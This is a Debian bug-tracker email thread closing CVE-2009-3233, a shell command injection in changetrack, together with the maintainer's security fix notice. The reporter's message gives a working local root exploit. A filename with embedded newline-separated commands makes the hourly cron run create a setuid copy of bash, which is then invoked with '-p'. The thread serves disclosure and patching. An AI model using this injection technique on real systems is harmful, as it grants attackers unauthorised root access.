Bug#546791: marked as done (CVE-2009-3233: shell command injection via filename)

Wed, 23 Sep 2009 19:38:42 -0700 

Your message dated Thu, 24 Sep 2009 01:57:50 +0000
with message-id <[email protected]>
and subject line Bug#546791: fixed in changetrack 4.3-3+etch1
has caused the Debian Bug report #546791,
regarding CVE-2009-3233: shell command injection via filename
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall's Practical Extraction 

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


Its is posible, to run commands as root, if you have permision to create
files in directory chcked via changetrack, example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack shudnot use shell commands, or escape sh special
haracters like spaces enters ; etc...

-- 
  Regards
      Marek Grzybowski

--- End Message ---
--- Begin Message --- 
Source: changetrack
Source-Version: 4.3-3+etch1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+etch1.diff.gz
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.diff.gz
changetrack_4.3-3+etch1.dsc
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.dsc
changetrack_4.3-3+etch1_all.deb
  to pool/main/c/changetrack/changetrack_4.3-3+etch1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <[email protected]> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+etch1
Distribution: oldstable-security
Urgency: medium
Maintainer: Jens Peter Secher <[email protected]>
Changed-By: Jens Peter Secher <[email protected]>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+etch1) oldstable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)
Files: 
 b519ffa08cb165819e9bdd67f7e9a4f3 710 utils optional changetrack_4.3-3+etch1.dsc
 3334d9ef744a08cc0b4d8253c78b7c10 13330 utils optional 
changetrack_4.3-3+etch1.diff.gz
 b1002889940ab122879f4d709fe8a573 21706 utils optional 
changetrack_4.3-3+etch1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)

iJwEAQECAAYFAkq2Zp8ACgkQiFVdEFPVQL/TagP9EUfyPWHxaOg+1R12oD3GBpGo
KT/avbj+06eCCQMwgBUdSpPYN/BBdV7N/xL67/sVk2NBMlm8vCcuQlj851t2DHU3
7M/A4R1rgMRybh0gT62MWdpaNs4OonhgKdangO5CWmUq1gD7G+Lc9+T5H15dU/pB
/r8CnXxEzHf+7tQrsFk=
=fCDZ
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to